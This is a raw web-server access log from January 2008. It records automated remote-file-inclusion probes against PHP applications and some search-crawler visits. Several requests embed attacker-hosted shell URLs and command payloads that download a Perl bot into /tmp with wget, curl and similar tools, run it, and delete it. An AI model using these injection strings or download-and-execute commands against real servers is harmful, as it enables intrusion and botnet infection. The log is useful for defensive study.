69.57.142.34 - - [16/Jan/2008:12:55:36 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.142.34 - - [16/Jan/2008:12:55:37 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:12:56:57 -0800] "GET /logs/access_071228.log///skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:12:56:58 -0800] "GET ///skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:12:56:58 -0800] "GET /logs///skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.142.34 - - [16/Jan/2008:12:57:49 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:12:58:17 -0800] "GET /logs/access.log///skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.27.33 - - [16/Jan/2008:13:00:00 -0800] "GET /tmp/?M=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:13:00:19 -0800] "GET /logs/access_071228.log///skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:13:00:19 -0800] "GET ///skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:13:00:20 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [16/Jan/2008:13:01:12 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
194.30.169.80 - - [16/Jan/2008:13:01:13 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:13:01:35 -0800] "GET /logs/access.log///skin/zero_vote/ask_password.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.135 - - [16/Jan/2008:13:02:01 -0800] "GET /logs/access_071228.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [16/Jan/2008:13:03:36 -0800] "GET /logs/access_071126.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.vennom.xpg.com.br/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [16/Jan/2008:13:03:36 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.vennom.xpg.com.br/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [16/Jan/2008:13:03:36 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.vennom.xpg.com.br/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:13:03:52 -0800] "GET /tmp/mailError.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
211.49.99.53 - - [16/Jan/2008:13:04:26 -0800] "GET /logs/access_071229.log///skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.49.99.53 - - [16/Jan/2008:13:04:26 -0800] "GET ///skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.49.99.53 - - [16/Jan/2008:13:04:27 -0800] "GET /logs///skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.203.211 - - [16/Jan/2008:13:05:41 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [16/Jan/2008:13:05:48 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [16/Jan/2008:13:05:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.216.11 - - [16/Jan/2008:13:06:22 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [16/Jan/2008:13:06:23 -0800] "GET /?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt?? HTTP/1.0" 200 2946 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [16/Jan/2008:13:06:23 -0800] "GET /logs/?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt?? HTTP/1.0" 200 30380 "-" "libwww-perl/5.53" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:13:15:13 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:13:15:13 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:13:20:12 -0800] "GET /logs/access_071118.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:13:20:53 -0800] "GET /logs/access_070728.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
84.243.216.139 - - [16/Jan/2008:13:21:23 -0800] "GET /logs/access_071229.log/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.216.139 - - [16/Jan/2008:13:21:23 -0800] "GET /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.216.139 - - [16/Jan/2008:13:21:23 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.192.195 - - [16/Jan/2008:13:21:24 -0800] "GET ///phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.192.195 - - [16/Jan/2008:13:22:10 -0800] "GET /logs/access_071225.log///phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.192.195 - - [16/Jan/2008:13:22:11 -0800] "GET ///phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.192.195 - - [16/Jan/2008:13:22:11 -0800] "GET /logs///phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.80 - - [16/Jan/2008:13:22:59 -0800] "GET /logs/access_071020.log HTTP/1.0" 200 15561 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:13:23:20 -0800] "GET /logs/access_070907.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
200.87.230.170 - - [16/Jan/2008:13:23:40 -0800] "GET /logs/access_071225.log/index.php?pagina1=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.216.11 - - [16/Jan/2008:13:23:53 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.7.192.195 - - [16/Jan/2008:13:23:59 -0800] "GET /logs/access_071225.log///phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.216.11 - - [16/Jan/2008:13:23:59 -0800] "GET /?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt?? HTTP/1.0" 200 2946 "-" "libwww-perl/5.53" "www.dmulk.com"
66.7.192.195 - - [16/Jan/2008:13:23:59 -0800] "GET ///phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.192.195 - - [16/Jan/2008:13:23:59 -0800] "GET /logs///phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.216.11 - - [16/Jan/2008:13:24:00 -0800] "GET /logs/?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt?? HTTP/1.0" 200 31007 "-" "libwww-perl/5.53" "www.dmulk.com"
200.87.230.170 - - [16/Jan/2008:13:24:16 -0800] "GET /logs/index.php?pagina1=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.21 - - [16/Jan/2008:13:26:16 -0800] "GET /funny/?N=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.117.219.17 - - [16/Jan/2008:13:28:26 -0800] "GET /config.inc.php?path_escape=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
87.117.219.17 - - [16/Jan/2008:13:28:26 -0800] "GET /logs/config.inc.php?path_escape=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
70.85.192.194 - - [16/Jan/2008:13:30:11 -0800] "GET /logs/access_080101.log///plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.192.194 - - [16/Jan/2008:13:30:11 -0800] "GET ///plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.192.194 - - [16/Jan/2008:13:30:11 -0800] "GET /logs///plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.232 - - [16/Jan/2008:13:30:50 -0800] "GET /bikes/ HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:13:31:09 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:13:31:09 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:13:31:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.152.158.46 - - [16/Jan/2008:13:33:50 -0800] "GET /logs/access_071222.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.152.158.46 - - [16/Jan/2008:13:33:51 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.152.158.46 - - [16/Jan/2008:13:33:51 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.152.158.46 - - [16/Jan/2008:13:34:10 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.152.158.46 - - [16/Jan/2008:13:34:10 -0800] "GET //skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.152.158.46 - - [16/Jan/2008:13:34:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:11 -0800] "GET //include.php?path[docroot]=http://www.red.info.pl/pub/shelle/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:13 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;GET+http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:14 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;wget+http://66.220.9.57/web/hyp3r/x.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:14 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;fetch%20http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:15 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;curl+http://66.220.9.57/web/hyp3r/x.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:16 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://66.220.9.57/web/hyp3r/x.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:16 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:34 -0800] "GET //include.php?path[docroot]=http://www.red.info.pl/pub/shelle/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:35 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;GET+http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:36 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;wget+http://66.220.9.57/web/hyp3r/x.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:37 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;fetch%20http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:37 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;curl+http://66.220.9.57/web/hyp3r/x.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:38 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://66.220.9.57/web/hyp3r/x.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.12.204.66 - - [16/Jan/2008:13:35:39 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.179.208 - - [16/Jan/2008:13:36:32 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.17.101.126 - - [16/Jan/2008:13:37:16 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.17.101.126 - - [16/Jan/2008:13:37:17 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:13:37:23 -0800] "GET /bikes/dteel/EQ2/Screenshots/ HTTP/1.1" 200 7116 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:13:37:46 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:13:37:46 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:13:37:46 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.251.15.100 - - [16/Jan/2008:13:38:23 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.251.15.100 - - [16/Jan/2008:13:38:23 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.251.15.100 - - [16/Jan/2008:13:38:23 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.7.191.92 - - [16/Jan/2008:13:38:30 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.7.191.92 - - [16/Jan/2008:13:38:30 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.7.191.92 - - [16/Jan/2008:13:38:30 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.201.206 - - [16/Jan/2008:13:39:11 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.201.206 - - [16/Jan/2008:13:39:11 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.201.206 - - [16/Jan/2008:13:39:11 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:13:39:14 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.140 - - [16/Jan/2008:13:40:01 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.140 - - [16/Jan/2008:13:40:01 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.140 - - [16/Jan/2008:13:40:01 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.144.137 - - [16/Jan/2008:13:42:20 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.144.137 - - [16/Jan/2008:13:42:21 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.144.137 - - [16/Jan/2008:13:42:22 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:13:42:39 -0800] "GET /tmp/sess_47c6756212fa7a947d494cee052e843c HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:13:42:39 -0800] "GET /tmp/sess_47d35cfa65216b059ce4f8008f9f015b HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
80.89.232.80 - - [16/Jan/2008:13:42:54 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [16/Jan/2008:13:42:54 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [16/Jan/2008:13:42:55 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.26.163 - - [16/Jan/2008:13:43:56 -0800] "GET /logs/access_071223.log HTTP/1.0" 200 97760 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.117.233.130 - - [16/Jan/2008:13:44:59 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
